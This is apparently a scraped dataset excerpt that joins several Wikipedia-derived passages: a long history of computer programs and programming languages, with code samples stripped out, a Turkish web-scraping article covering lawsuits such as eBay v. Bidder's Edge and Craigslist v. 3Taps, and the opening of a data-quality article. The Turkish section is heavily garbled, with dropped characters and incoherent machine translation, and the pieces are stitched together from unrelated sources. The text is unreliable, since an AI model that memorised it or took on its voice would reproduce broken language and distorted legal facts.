the computer was an evolutionary dead-end because it was extremely expensive. Also, it was built at a public university lab for a specific purpose. 37 Nonetheless, the project contributed to the development of the Intel 8080 (1974) instruction set. 29 In 1978, the modern software development environment began when Intel upgraded the Intel 8080 to the Intel 8086. Intel simplified the Intel 8086 to manufacture the cheaper Intel 8088. 38 IBM embraced the Intel 8088 when they entered the personal computer market (1981). As consumer demand for personal computers increased, so did Intel's microprocessor development. The succession of development is known as the x86 series. The x86 assembly language is a family of backward-compatible machine instructions. Machine instructions created in earlier microprocessors were retained throughout microprocessor upgrades. This enabled consumers to purchase new computers without having to purchase new application software. The major categories of instructions are: c VLSI circuits enabled the programming environment to advance from a computer terminal (until the 1990s) to a graphical user interface (GUI) computer. Computer terminals limited programmers to a single shell running in a command-line environment. During the 1970s, full-screen source code editing became possible through a text-based user interface. Regardless of the technology available, the goal is to program in a programming language. Programming language features exist to provide building blocks to be combined to express programming ideals. 39 Ideally, a programming language should: 39 The programming style of a programming language to provide these building blocks may be categorized into programming paradigms. 40 For example, different paradigms may differentiate: 40 Each of these programming styles has contributed to the synthesis of different programming languages. 40 A programming language is a set of keywords, symbols, identifiers, and rules by which programmers can communicate instructions to the computer. 41 They follow a set of rules called a syntax. 41 Programming languages get their basis from formal languages. 42 The purpose of defining a solution in terms of its formal language is to generate an algorithm to solve the underlining problem. 42 An algorithm is a sequence of simple instructions that solve a problem. 43 The evolution of programming languages began when the EDSAC (1949) used the first stored computer program in its von Neumann architecture. 44 Programming the EDSAC was in the first generation of programming language. Imperative languages specify a sequential algorithm using declarations, expressions, and statements: 52 FORTRAN (1958) was unveiled as "The IBM Mathematical FORmula TRANslating system". It was designed for scientific calculations, without string handling facilities. Along with declarations, expressions, and statements, it supported: It succeeded because: However, non-IBM vendors also wrote Fortran compilers, but with a syntax that would likely fail IBM's compiler. 54 The American National Standards Institute (ANSI) developed the first Fortran standard in 1966. In 1978, Fortran 77 became the standard until 1991. Fortran 90 supports: COBOL (1959) stands for "COmmon Business Oriented Language". Fortran manipulated symbols. It was soon realized that symbols did not need to be numbers, so strings were introduced. 55 The US Department of Defense influenced COBOL's development, with Grace Hopper being a major contributor. The statements were English-like and verbose. The goal was to design a language so managers could read the programs. However, the lack of structured statements hindered this goal. 56 COBOL's development was tightly controlled, so dialects did not emerge to require ANSI standards. As a consequence, it was not changed for 15 years until 1974. The 1990s version did make consequential changes, like object-oriented programming. 56 ALGOL (1960) stands for "ALGOrithmic Language". It had a profound influence on programming language design. 57 Emerging from a committee of European and American programming language experts, it used standard mathematical notation and had a readable, structured design. Algol was first to define its syntax using the Backus Naur form. 57 This led to syntax-directed compilers. It added features like: Algol's direct descendants include Pascal, Modula 2, Ada, Delphi and Oberon on one branch. On another branch the descendants include C, C and Java. 57 BASIC (1964) stands for "Beginner's All-Purpose Symbolic Instruction Code". It was developed at Dartmouth College for all of their students to learn. 8 If a student did not go on to a more powerful language, the student would still remember Basic. 8 A Basic interpreter was installed in the microcomputers manufactured in the late 1970s. As the microcomputer industry grew, so did the language. 8 Basic pioneered the interactive session. 8 It offered operating system commands within its environment: However, the Basic syntax was too simple for large programs. 8 Recent dialects added structure and object-oriented extensions. Microsoft's Visual Basic is still widely used and produces a graphical user interface. 7 C programming language (1973) got its name because the language BCPL was replaced with B, and AT T Bell Labs called the next version "C". Its purpose was to write the UNIX operating system. 50 C is a relatively small language, making it easy to write compilers. Its growth mirrored the hardware growth in the 1980s. 50 Its growth also was because it has the facilities of assembly language, but uses a high-level syntax. It added advanced features like: C allows the programmer to control which region of memory data is to be stored. Global variables and static variables require the fewest clock cycles to store. The stack is automatically used for the standard variable declarations. Heap memory is returned to a pointer variable from the malloc() function. In the 1970s, software engineers needed language support to break large projects down into modules. 65 One obvious feature was to decompose large projects physically into separate files. A less obvious feature was to decompose large projects logically into abstract data types. 65 At the time, languages supported concrete (scalar) datatypes like integer numbers, floating-point numbers, and strings of characters. Abstract datatypes are structures of concrete datatypes, with a new name assigned. For example, a list of integers could be called integer list. In object-oriented jargon, abstract datatypes are called classes. However, a class is only a definition; no memory is allocated. When memory is allocated to a class and bound to an identifier, it is called an object. 66 Object-oriented imperative languages developed by combining the need for classes and the need for safe functional programming. 67 A function, in an object-oriented language, is assigned to a class. An assigned function is then referred to as a method, member function, or operation. Object-oriented programming is executing operations on objects. 68 Object-oriented languages support a syntax to model subset superset relationships. In set theory, an element of a subset inherits all the attributes contained in the superset. For example, a student is a person. Therefore, the set of students is a subset of the set of persons. As a result, students inherit all the attributes common to all persons. Additionally, students have unique attributes that other people do not have. Object-oriented languages model subset superset relationships using inheritance. 69 Object-oriented programming became the dominant language paradigm by the late 1990s. 65 C (1985) was originally called "C with Classes". 70 It was designed to expand C's capabilities by adding the object-oriented facilities of the language Simula. 71 An object-oriented module is composed of two files. The definitions file is called the header file. Here is a C header file for the GRADE class in a simple school application: A constructor operation is a function with the same name as the class name. 72 It is executed when the calling operation executes the new statement. A module's other file is the source file. Here is a C source file for the GRADE class in a simple school application: Here is a C header file for the PERSON class in a simple school application: Here is a C source file for the PERSON class in a simple school application: Here is a C header file for the STUDENT class in a simple school application: Here is a C source file for the STUDENT class in a simple school application: Here is a driver program for demonstration: Here is a makefile to compile everything: Imperative languages have one major criticism: assigning an expression to a non-local variable may produce an unintended side effect. 73 Declarative languages generally omit the assignment statement and the control flow. They describe what computation should be performed and not how to compute it. Two broad categories of declarative languages are functional languages and logical languages. The principle behind a functional language is to use lambda calculus as a guide for a well defined semantic. 74 In mathematics, a function is a rule that maps elements from an expression to a range of values. Consider the function: times 10(x) 10 x The expression 10 x is mapped by the function times 10() to a range of values. One value happens to be 20. This occurs when x is 2. So, the application of the function is mathematically written as: times 10(2) 20 A functional language compiler will not store this value in a variable. Instead, it will push the value onto the computer's stack before setting the program counter back to the calling function. The calling function will then pop the value from the stack. 75 Imperative languages do support functions. Therefore, functional programming can be achieved in an imperative language, if the programmer uses discipline. However, a functional language will force this discipline onto the programmer through its syntax. Functional languages have a syntax tailored to emphasize the what. 76 A functional program is developed with a set of primitive functions followed by a single driver function. 73 Consider the snippet: function max( a, b ) code omitted function min( a, b ) code omitted function range( a, b, c ) The primitives are max() and min(). The driver function is range(). Executing: put( range( 10, 4, 7) ); will output 6. Functional languages are used in computer science research to explore new language features. 77 Moreover, their lack of side-effects have made them popular in parallel programming and concurrent programming. 78 However, application developers prefer the object-oriented features of imperative languages. 78 Lisp (1958) stands for "LISt Processor". 79 It is tailored to process lists. A full structure of the data is formed by building lists of lists. In memory, a tree data structure is built. Internally, the tree structure lends nicely for recursive functions. 80 The syntax to build a tree is to enclose the space-separated elements within parenthesis. The following is a list of three elements. The first two elements are themselves lists of two elements: ((A B) (HELLO WORLD) 94) Lisp has functions to extract and reconstruct elements. 81 The function head() returns a list containing the first element in the list. The function tail() returns a list containing everything but the first element. The function cons() returns a list that is the concatenation of other lists. Therefore, the following expression will return the list x: cons(head(x), tail(x)) One drawback of Lisp is when many functions are nested, the parentheses may look confusing. 76 Modern Lisp environments help ensure parenthesis match. As an aside, Lisp does support the imperative language operations of the assignment statement and goto loops. 82 Also, Lisp is not concerned with the datatype of the elements at compile time. 83 Instead, it assigns (and may reassign) the datatypes at runtime. Assigning the datatype at runtime is called dynamic binding. 84 Whereas dynamic binding increases the language's flexibility, programming errors may linger until late in the software development process. 84 Writing large, reliable, and readable Lisp programs requires forethought. If properly planned, the program may be much shorter than an equivalent imperative language program. 76 Lisp is widely used in artificial intelligence. However, its usage has been accepted only because it has imperative language operations, making unintended side-effects possible. 78 ML (1973) 85 stands for "Meta Language". ML checks to make sure only data of the same type are compared with one another. 86 For example, this function has one input parameter (an integer) and returns an integer: ML is not parenthesis-eccentric like Lisp. The following is an application of times 10(): It returns "20 : int". (Both the results and the datatype are returned.) Like Lisp, ML is tailored to process lists. Unlike Lisp, each element is the same datatype. 87 Moreover, ML assigns the datatype of an element at compile-time. Assigning the datatype at compile-time is called static binding. Static binding increases reliability because the compiler checks the context of variables before they are used. 88 Prolog (1972) stands for "PROgramming in LOGic". It is a logic programming language, based on formal logic. The language was developed by Alain Colmerauer and Philippe Roussel in Marseille, France. It is an implementation of Selective Linear Definite clause resolution, pioneered by Robert Kowalski and others at the University of Edinburgh. 89 The building blocks of a Prolog program are facts and rules. Here is a simple example: After all the facts and rules are entered, then a question can be asked: The following example shows how Prolog will convert a letter grade to its numeric value: Here is a comprehensive example: 90 1) All dragons billow fire, or equivalently, a thing billows fire if the thing is a dragon: 2) A creature billows fire if one of its parents billows fire: 3) A thing X is a parent of a thing Y if X is the mother of Y or X is the father of Y: 4) A thing is a creature if the thing is a dragon: 5) Norberta is a dragon, and Puff is a creature. Norberta is the mother of Puff. Rule (2) is a recursive (inductive) definition. It can be understood declaratively, without the need to understand how it is executed. Rule (3) shows how functions are represented by using relations. Here, the mother and father functions ensure that every individual has only one mother and only one father. Prolog is an untyped language. Nonetheless, inheritance can be represented by using predicates. Rule (4) asserts that a creature is a superclass of a dragon. Questions are answered using backward reasoning. Given the question: Prolog generates two answers : Practical applications for Prolog are knowledge representation and problem solving in artificial intelligence. Object-oriented programming is a programming method to execute operations (functions) on objects. 91 The basic idea is to group the characteristics of a phenomenon into an object container and give the container a name. The operations on the phenomenon are also grouped into the container. 91 Object-oriented programming developed by combining the need for containers and the need for safe functional programming. 92 This programming method need not be confined to an object-oriented language. 93 In an object-oriented language, an object container is called a class. In a non-object-oriented language, a data structure (which is also known as a record) may become an object container. To turn a data structure into an object container, operations need to be written specifically for the structure. The resulting structure is called an abstract datatype. 94 However, inheritance will be missing. Nonetheless, this shortcoming can be overcome. Here is a C programming language header file for the GRADE abstract datatype in a simple school application: The grade new() function performs the same algorithm as the C constructor operation. Here is a C programming language source file for the GRADE abstract datatype in a simple school application: In the constructor, the function calloc() is used instead of malloc() because each memory cell will be set to zero. Here is a C programming language header file for the PERSON abstract datatype in a simple school application: Here is a C programming language source file for the PERSON abstract datatype in a simple school application: Here is a C programming language header file for the STUDENT abstract datatype in a simple school application: Here is a C programming language source file for the STUDENT abstract datatype in a simple school application: Here is a driver program for demonstration: Here is a makefile to compile everything: The formal strategy to build object-oriented objects is to: 95 For example: The syntax of a computer program is a list of production rules which form its grammar. 96 A programming language's grammar correctly places its declarations, expressions, and statements. 97 Complementing the syntax of a language are its semantics. The semantics describe the meanings attached to various syntactic constructs. 98 A syntactic construct may need a semantic description because a production rule may have an invalid interpretation. 99 Also, different languages might have the same syntax; however, their behaviors may be different. The syntax of a language is formally described by listing the production rules. Whereas the syntax of a natural language is extremely complicated, a subset of the English language can have this production rule listing: 100 The words in bold-face are known as non-terminals. The words in 'single quotes' are known as terminals. 101 From this production rule listing, complete sentences may be formed using a series of replacements. 102 The process is to replace non-terminals with either a valid non-terminal or a valid terminal. The replacement process repeats until only terminals remain. One valid sentence is: However, another combination results in an invalid sentence: Therefore, a semantic is necessary to correctly describe the meaning of an eat activity. One production rule listing method is called the Backus Naur form (BNF). 103 BNF describes the syntax of a language and itself has a syntax. This recursive definition is an example of a meta-language. 98 The syntax of BNF includes: Using BNF, a subset of the English language can have this production rule listing: Using BNF, a signed-integer has the production rule listing: 104 Notice the recursive production rule: This allows for an infinite number of possibilities. Therefore, a semantic is necessary to describe a limitation of the number of digits. Notice the leading zero possibility in the production rules: Therefore, a semantic is necessary to describe that leading zeros need to be ignored. Two formal methods are available to describe semantics. They are denotational semantics and axiomatic semantics. 105 Software engineering is a variety of techniques to produce quality computer programs. 106 Computer programming is the process of writing or editing source code. In a formal environment, a systems analyst will gather information from managers about all the organization's processes to automate. This professional then prepares a detailed plan for the new or modified system. 107 The plan is analogous to an architect's blueprint. 107 The systems analyst has the objective to deliver the right information to the right person at the right time. 108 The critical factors to achieve this objective are: 108 Achieving performance objectives should be balanced with all of the costs, including: 109 Applying a systems development process will mitigate the axiom: the later in the process an error is detected, the more expensive it is to correct. 110 The waterfall model is an implementation of a systems development process. 111 As the waterfall label implies, the basic phases overlap each other: 112 A computer programmer is a specialist responsible for writing or modifying the source code to implement the detailed plan. 107 A programming team is likely to be needed because most systems are too large to be completed by a single programmer. 114 However, adding programmers to a project may not shorten the completion time. Instead, it may lower the quality of the system. 114 To be effective, program modules need to be defined and distributed to team members. 114 Also, team members must interact with one another in a meaningful and effective way. 114 Computer programmers may be programming in the small: programming within a single module. 115 Chances are a module will execute modules located in other source code files. Therefore, computer programmers may be programming in the large: programming modules so they will effectively couple with each other. 115 Programming-in-the-large includes contributing to the application programming interface (API). Modular programming is a technique to refine imperative language programs. Refined programs may reduce the software size, separate responsibilities, and thereby mitigate software aging. A program module is a sequence of statements that are bounded within a block and together identified by a name. 116 Modules have a function, context, and logic: 117 The module's name should be derived first by its function, then by its context. Its logic should not be part of the name. 117 For example, function compute square root( x ) or function compute square root integer( i : integer ) are appropriate module names. However, function compute square root by division( x ) is not. The degree of interaction within a module is its level of cohesion. 117 Cohesion is a judgment of the relationship between a module's name and its function. The degree of interaction between modules is the level of coupling. 118 Coupling is a judgement of the relationship between a module's context and the elements being performed upon. The levels of cohesion from worst to best are: 119 The levels of coupling from worst to best are: 118 Data flow analysis is a design method used to achieve modules of functional cohesion and data coupling. 120 The input to the method is a data-flow diagram. A data-flow diagram is a set of ovals representing modules. Each module's name is displayed inside its oval. Modules may be at the executable level or the function level. The diagram also has arrows connecting modules to each other. Arrows pointing into modules represent a set of inputs. Each module should have only one arrow pointing out from it to represent its single output object. (Optionally, an additional exception arrow points out.) A daisy chain of ovals will convey an entire algorithm. The input modules should start the diagram. The input modules should connect to the transform modules. The transform modules should connect to the output modules. 121 Computer programs may be categorized along functional lines. The main functional categories are application software and system software. System software includes the operating system, which couples computer hardware with application software. 122 The purpose of the operating system is to provide an environment where application software executes in a convenient and efficient manner. 122 Both application software and system software execute utility programs. At the hardware level, a microcode program controls the circuits throughout the central processing unit. Application software is the key to unlocking the potential of the computer system. 123 Enterprise application software bundles accounting, personnel, customer, and vendor applications. Examples include enterprise resource planning, customer relationship management, and supply chain management software. Enterprise applications may be developed in-house as a one-of-a-kind proprietary software. 124 Alternatively, they may be purchased as off-the-shelf software. Purchased software may be modified to provide custom software. If the application is customized, then either the company's resources are used or the resources are outsourced. Outsourced software development may be from the original software vendor or a third-party developer. 125 The potential advantages of in-house software are features and reports may be developed exactly to specification. 126 Management may also be involved in the development process and offer a level of control. 127 Management may decide to counteract a competitor's new initiative or implement a customer or vendor requirement. 128 A merger or acquisition may necessitate enterprise software changes. The potential disadvantages of in-house software are time and resource costs may be extensive. 124 Furthermore, risks concerning features and performance may be looming. The potential advantages of off-the-shelf software are upfront costs are identifiable, the basic needs should be fulfilled, and its performance and reliability have a track record. 124 The potential disadvantages of off-the-shelf software are it may have unnecessary features that confuse end users, it may lack features the enterprise needs, and the data flow may not match the enterprise's work processes. 124 One approach to economically obtaining a customized enterprise application is through an application service provider. 129 Specialty companies provide hardware, custom software, and end-user support. They may speed the development of new applications because they possess skilled information system staff. The biggest advantage is it frees in-house resources from staffing and managing complex computer projects. 129 Many application service providers target small, fast-growing companies with limited information system resources. 129 On the other hand, larger companies with major systems will likely have their technical infrastructure in place. One risk is having to trust an external organization with sensitive information. Another risk is having to trust the provider's infrastructure reliability. 129 An operating system is the low-level software that supports a computer's basic functions, such as scheduling processes and controlling peripherals. 122 In the 1950s, the programmer, who was also the operator, would write a program and run it. After the program finished executing, the output may have been printed, or it may have been punched onto paper tape or cards for later processing. 28 More often than not the program did not work. The programmer then looked at the console lights and fiddled with the console switches. If less fortunate, a memory printout was made for further study. In the 1960s, programmers reduced the amount of wasted time by automating the operator's job. A program called an operating system was kept in the computer at all times. 130 The term operating system may refer to two levels of software. 131 The operating system may refer to the kernel program that manages the processes, memory, and devices. More broadly, the operating system may refer to the entire package of the central software. The package includes a kernel program, command-line interpreter, graphical user interface, utility programs, and editor. 131 The kernel's main purpose is to manage the limited resources of a computer: Originally, operating systems were programmed in assembly; however, modern operating systems are typically written in higher-level languages like C, Objective-C, and Swift. k A utility program is designed to aid system administration and software execution. Operating systems execute hardware utility programs to check the status of disk drives, memory, speakers, and printers. 140 A utility program may optimize the placement of a file on a crowded disk. System utility programs monitor hardware and network performance. When a metric is outside an acceptable range, a trigger alert is generated. 141 Utility programs include compression programs so data files are stored on less disk space. 140 Compressed programs also save time when data files are transmitted over the network. 140 Utility programs can sort and merge data sets. 141 Utility programs detect computer viruses. 141 A microcode program is the bottom-level interpreter that controls the data path of software-driven computers. 142 (Advances in hardware have migrated these operations to hardware execution circuits.) 142 Microcode instructions allow the programmer to more easily implement the digital logic level 143 —the computer's real hardware. The digital logic level is the boundary between computer science and computer engineering. 144 A logic gate is a tiny transistor that can return one of two signals: on or off. 145 These five gates form the building blocks of binary algebra—the digital logic functions of the computer. Microcode instructions are mnemonics programmers may use to execute digital logic functions instead of forming them in binary algebra. They are stored in a central processing unit's (CPU) control store. 146 These hardware-level instructions move data throughout the data path. The micro-instruction cycle begins when the microsequencer uses its microprogram counter to fetch the next machine instruction from random-access memory. 147 The next step is to decode the machine instruction by selecting the proper output line to the hardware module. 148 The final step is to execute the instruction using the hardware module's set of gates. Instructions to perform arithmetic are passed through an arithmetic logic unit (ALU). 149 The ALU has circuits to perform elementary operations to add, shift, and compare integers. By combining and looping the elementary operations through the ALU, the CPU performs its complex arithmetic. Microcode instructions move data between the CPU and the memory controller. Memory controller microcode instructions manipulate two registers. The memory address register is used to access each memory cell's address. The memory data register is used to set and read each cell's contents. 150 Microcode instructions move data between the CPU and the many computer buses. The disk controller bus writes to and reads from hard disk drives. Data is also moved between the CPU and other functional units via the peripheral component interconnect express bus. 151 |
288 | https://en.wikipedia.org/wiki/Web_scraping | https://tr.wikipedia.org/wiki/Web_kaz%C4%B1ma | Web kaz ma (web hasat veya web veri ekimi), web sitelerinden bilgi kartman n bilgisayar program tekni idir. o unlukla, bu t r yaz l m programlar d k seviye K pr Metni Aktar m Protokol (HTTP) veya Mozilla Firefox gibi tam te ekk ll g m l web taray c s taraf ndan World Wide Web'in insan ara t rmalar sim le edilir. Web kaz ma, web indeksleme ile yak ndan ilgilidir, web'de hangi bilgi indekslenmi se bir bot ya da web gezgini kullan lm t r ve bu o u arama motoru taraf ndan benimsenen evrensel bir tekniktir. Buna kar l k, web kaz ma genellikle web'de HTML bi imindeki yap land r lmam verilerin d n m ne odaklan r, yap land r lm veriler merkezi yerel veritaban nda ya da tablolarda analiz edilip saklanabilir. Web kaz ma ayn zamanda web otomasyonuyla ilgilidir, insan taramas n n sim le edilmesi bilgisayar program kullan larak yap l r. Web kaz man n kullan m , online fiyat kar la t rmas , ileti im bilgileri kaz m , hava durumu takibi, website de i ikliklerinin bulunmas , web mashup ve web bilgi entegrasyonunu i erir. Web kaz ma yak ndan o u arama motorlar taraf ndan benimsenen evrensel bir tekniktir bot veya web taray c m z n kullanarak web'de dizine bilgileri ve web indeksleme ile ilgilidir. Buna kar l k, web kaz ma merkezi yerel veritaban veya elektronik saklan r ve analiz edilebilir yap land r lm veri i ine, genellikle HTML bi iminde, web zerinde yap land r lmam verilerin d n m daha fazla odaklan yor. Web kaz ma ayr ca bilgisayar yaz l m kullan larak insan tarama taklit web otomasyon ile ilgilidir. Web kaz ma Kullan m Online fiyat kar la t rma, ileti im kaz ma, hava durumu verileri izleme, web sitesi de i ikli i alg lama, ara t rma, web mashup ve web veri entegrasyonu yer al yor. Web kaz ma otomatik World Wide Web'den bilgi toplama i lemidir. Bu semantik web vizyonu, hala metin i leme, anlamsal anlay , yapay zeka ve insan-bilgisayar etkile iminde devrimler gerektiren iddial bir giri im ile ortak hedefe payla an aktif geli melerin bir aland r. Mevcut web kaz ma z mleri tamamen s n rlamalar, yap land r lm bilgi i ine t m web sitelerini d n t rmek m mk n otomatik sistemlere kadar, insan aba gerektiren, reklam hoc aras nda de i ir. Web kaz ma baz web sitelerinin kullan m ko ullar n ayk r olabilir. Bu terimlerin uygulanabilirli i belirsizdir. Orijinal ifadenin d ped z o alt lmas bir ok durumda yasad olacak olsa, Amerika Birle ik Devletleri mahkemeleri ger eklerin o alt lmas izin oldu unu Feist Yay nlar v. K rsal Telefon Hizmeti karar verdi. ABD mahkemeleri "kaz y c " veya "robotlar" nin kullan c lar n kaz y c kullan c ge meleri ise bunun zerine kendisinin ki isel m lkiyet kabul ediliyor, bir bilgisayar sistemi gerektirir ta n r i in haneye tecav z, i lemekten sorumlu olabilece ini kabul etmektedir. En iyi bu gibi durumlarda bilinen, eBay v. Teklif Sahibinin Kenar, toplama, eri en durdurmak i in bir tedbir sipari Teklif Sahibinin Edge sonu land ve eBay web sitesinden indeksleme ihaleleri. Bu durum ihale sniping olarak bilinen tekliflerin otomatik yerle tirerek, i eriyordu. Ancak, ta n r i in haneye tecav z iddias zerine ba ar l olmak i in, davac daval kasten ve izinsiz bilgisayar sisteminde davac n n sahiplik ilgi ile ve san n izinsiz kullan m davac ya zarar oldu unu m dahale oldu unu g stermek zorundad r. Mahkemeler ta n r i in su olarak kabul edilmi tir nce de il, web spidering t m olgular getirdi. 2 Ekran n ilk nemli testlerden biri American Airlines (AA) dahil ve FareChase ad nda bir firma kaz ma. AA ba ar yla da AA'n n web sitesini arar e er evrimi i tarifeleri kar la t rmak olanak tan r yaz l m satan farechase durdurma, Texas mahkemesinin bir emir ald . Havayolu kamuya a k verileri toplam zaman farechase en websearch yaz l m AA'n n sunucular nda tecav z savundu. FareChase Haziran farechase taraf ndan 2003 y l Mart ay nda bir temyiz ba vurusunda ve AA yerle meye karar verdiler ve temyiz d t . 3 Southwest Airlines ayr ca ekran kaz ma uygulamalar meydan ve farechase ve yasal iddia ba ka bir firma, Outtask, hem de yer vard r. Southwest Airlines o "Bilgisayar Doland r c l ve K t ye" bir rne idir ve "Hasar ve Zarar" ve Southwest'in sitenin "Yetkisiz Eri im" yol a m t r nk ekran kaz ma Yasad oldu unu su lad . Ayn zamanda " li kileri Giri im", " zinsiz" ve "Bilgisayar sa l a zararl d r Eri im" olu turmaktad r. Onlar da ekran kaz ma yasal "zimmete para ge irme ve Sebepsiz zenginle me", yan s ra web sitesinin kullan c s zle mesi ihlal olarak bilinen te kil etti ini iddia etti. Outtask Bu durumda hakim kanun ABD Telif hakk yasas ve telif hakk alt nda, bilgi par alar telif hakk korumas na tabi olmayacakt r kaz narak varl k oldu unu olmas gerekti ini iddia ederek, t m bu iddialar yalanlad . Davalar, Amerika Birle ik Devletleri Y ksek Mahkemesi giderilmi asla ra men, FareChase sonunda ana irket Yahoo taraf ndan kepenkli edildi ve Outtask seyahat gideri irketi hemfikir taraf ndan sat n al nd . 2012 y l nda, 3Taps ad nda bir ba lang Craigslist adl gizli konut reklamlar kaz nm . Craigslist 3Taps-kes ve-vazge mek mektup g ndermi ve onlar n IP adreslerini bloke daha sonra Craigslist v. 3Taps olarak, dava a t . Mahkeme Craigslist d zg n 3Taps oldu unu Bilgisayar Doland r c l k ihlal ve K t ye Kullanma Yasas vard iddia etmek i in ate kes ve-vazge mek mektup ve IP engelleme yeterli oldu una karar vermi tir. Bu erken kaz ma kararlar ve sorumluluk teorileri niforma olmasa da, bu mahkemelerin bu t r sitelerin sahiplerine istenmeyen kullan mlar ticari sitelerde zel i eri i korumak i in haz r olduklar n ortaya bir model g z ard etmek zordur. Ancak, bu t r i erik i in koruma derecesi yerle mi de ildir ve raspa taraf ndan yap lan eri im t r ne ba l d r, bilgi miktar eri ilebilir ve kopyalanamaz, derecesi eri imi olumsuz sitesi sahibinin sistemi ve t rleri ve etkileri b yle davran zerindeki yasaklar ekilde. 4 Bu alanda yasa daha yerle mi olur iken, ki iler hakk nda da bu t r eylem kullan m ve di er artlar veya bildirimler yay nlanan veya site arac l yla sunulan ko ullar n g zden taraf ndan yetkilendirilmi olup olmad n d nmelisiniz kamu web sitesine eri mek i in kaz ma programlar kullan larak d n rken. Cvent, Inc v bir 2010 karar nda. Eventbrite, Inc Virginia do u b lgesi i in Amerika Birle ik Devletleri b lge mahkemesi, mahkeme kullan m ko ullar bir browse i in i in kullan c lar n dikkatine getirdi gerekti ine h kmetti al s zle mesi veya lisans uygulanmak zere. Pennsylvania Do u B lgesi ABD B lge Mahkemesi a lan bir 2014, y l nda, e-ticaret sitesi QVC ger ek zamanl fiyatland rma verilerine QVC sitesinin Pinterest benzeri bir al veri toplay c Resultly en kaz ma itiraz. QVC Resultly QVC perakende sitesi QVC i in kay p sat sonu lan r iki g n kmesine QVC sitesini neden (s zde Dakikada 36.000 isteklerine bazen dakikada QVC web sitesine 200 300 arama istekleri g ndererek) "a r s r nerek" diye allges. QVC yapt ikayet daval kaynak IP adresini maskelemek i in web taray c s n gizlenmi ve b ylece h zl bir ekilde sorunu tamir dan QVC engelledi iddia etmektedir. QVC QVC iddialar Resultly neden oldu kendi web sitesi, kullan lamamas i in tazminat istiyor nk bu zellikle ilgin kaz ma durumdur. Kullan m link artlar internet zerindeki en siteleri gibi sayfan n alt ndaki sitenin t m ba lant lar , i inde g r nt lenen bu davan n d neminde davac n n web sitesinde. Bu iktidar a a da a klanan rlandal karar eli mektedir. Mahkeme ayr ca g z al k s tlamalar D zg n Bilgisayar Enformasyon lemleri Yasas (UCITA )bir ok ortak g z al m teahhitlik uygulamalar konusunda lehine oldu una inan yordu -a niforma hukuku Virginia'n n kabul g r n m nde uygulanabilir oldu u davac n n iddias n reddetmi tir. 5 Amerika Birle ik Devletleri d nda, 2006 y l ubat ay nda, Danimarka Denizcilik ve Ticaret Mahkemesi (Kopenhag )Home.dk Danimarkal yasa veya ak mamas emlak sitesi portal sitesi OfiR.dk sistematik taranmas na, indeksleme ve derin ba lama h kmetti Avrupa Birli i direktifi veritaban . 6 2009 y l nda Facebook bilinen bir web kaz y c kar ilk telif tak m elbise birini kazand . Bu mahkemelerin internette oldu u gibi adil kullan m adland r lan elimden do rudan telif hakk ihlali ve ok net parasal zararlar En son durumda olmak AP v erime suyundan olu an, birlikte kaz ma herhangi bir web kravat say s z davalar i in zemin haz rlam t r. 7 ubat yarg konular nda karma k 2.010 dava, rlanda'n n Y ksek Mahkemesi i tihatlar n geli tirme inchoate durumunu g steren bir karar verdi. Ryanair Ltd v Billigfluege.de GmbH irketinin durumunda, rlanda'n n Y ksek Mahkemesi yasal olarak ba lay c olmas n Ryanair click- wrap anla mas h kmetti. ABD B lge Mahkemesi Do u Virginia B lge ve Danimarka Denizcilik ve Ticaret Mahkemesi bu bulgular aksine, Say n Adalet Michael Hanna Ryanair' n h k m ve ko ullara k pr a k a g r n r oldu ve o h kmetti zerinde y k ml l klerini de ortadan yerle tirerek kullan c bir s zle me ili kisi i ermesi yeterlidir evrimi i hizmetlere eri mek amac yla artlar ve ko ullar kabul etmek. Karar rlanda'n n Yarg tay'da temyiz a amas ndad r .I 8 Avustralya, Spam Yasas 2003 haydutlar web hasat baz formlar , bu sadece e-posta adreslerine de ge erlidir ra men 9 10 Bir web sitesinin y neticisi durdurmak veya bot yava e itli nlemler kullanabilirsiniz. Baz teknikler unlard r: Web Kaz ma : Bilmeniz Wanted (ama sormak korktular) Her ey 11 Web kaz ma otomatik olarak World Wide Web zerinden bilgi toplama i lemidir. Mevcut web kaz ma z mleri, ad-hoc, insan abas gerektiren, t m websitelerini yap land r lm verilere d n t ren tam otomatik sistemler ve baz s n rlamalar aras ndad r. |
289 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_quality | Data quality refers to the state of qualitative or quantitative pieces of information. There are many definitions of data quality, but data is generally considered high quality if it is "fit for its intended uses in operations, decision making and planning". 1 2 3 Moreover, data is deemed of high quality if it correctly represents the real-world construct to which it refers. Furthermore, apart from these definitions, as the number of data sources increases, the question of internal data consistency becomes significant, regardless of fitness for use for any particular external purpose. People's views on data quality can often be in disagreement, even when discussing the same set of data used for the same purpose. When this is the case, data governance is used to form agreed upon definitions and standards for data quality. In such cases, data cleansing, including standardization, may be required in order to ensure data quality. 4 Defining data quality is difficult due to the many contexts data are used in, as well as the varying perspectives among end users, producers, and custodians of data. 5 From a consumer perspective, data quality is: 5 From a business perspective, data quality is: From a standards-based perspective, data quality is: Arguably, in all these cases, "data quality" is a comparison of the actual state of a particular set of data to a desired state, with the desired state being typically referred to as "fit for use, "to specification, "meeting consumer expectations, "free of defect, or "meeting requirements. These expectations, specifications, and requirements are usually defined by one or more individuals or groups, standards organizations, laws and regulations, business policies, or software development policies. 5 Drilling down further, those expectations, specifications, and requirements are stated in terms of characteristics or dimensions of the data, such as: 5 6 7 8 11 A systematic scoping review of the literature suggests that data quality dimensions and methods with real world data are not consistent in the literature, and as a result quality assessments are challenging due to the complex and heterogeneous nature of these data. 11 Before the rise of the inexpensive computer data storage, massive mainframe computers were used to maintain name and address data for delivery services. This was so that mail could be properly routed to its destination. The mainframes used business rules to correct common misspellings and typographical errors in name and address data, as well as to track customers who had moved, died, gone to prison, married, divorced, or experienced other life-changing events. Government agencies began to make postal data available to a few service companies to cross-reference customer data with the National Change of Address registry (NCOA). This technology saved large companies millions of dollars in comparison to manual correction of customer data. Large companies saved on postage, as bills and direct marketing materials made their way to the intended customer more accurately. Initially sold as a service, data quality moved inside the walls of corporations, as low-cost and powerful server technology became available. citation needed Companies with an emphasis on marketing often focused their quality efforts on name and address information, but data quality is recognized by whom? as an important property of all types of data. Principles of data quality can be applied to supply chain data, transactional data, and nearly every other category of data found. For example, making supply chain data conform to a certain standard has value to an organization by: 1) avoiding overstocking of similar but slightly different stock; 2) avoiding false stock-out; 3) improving the understanding of vendor purchases to negotiate volume discounts; and 4) avoiding logistics costs in stocking and shipping parts across a large organization. citation needed For companies with significant research efforts, data quality can include developing protocols for research methods, reducing measurement error, bounds checking of data, cross tabulation, modeling and outlier detection, verifying data integrity, etc. citation needed There are a number of theoretical 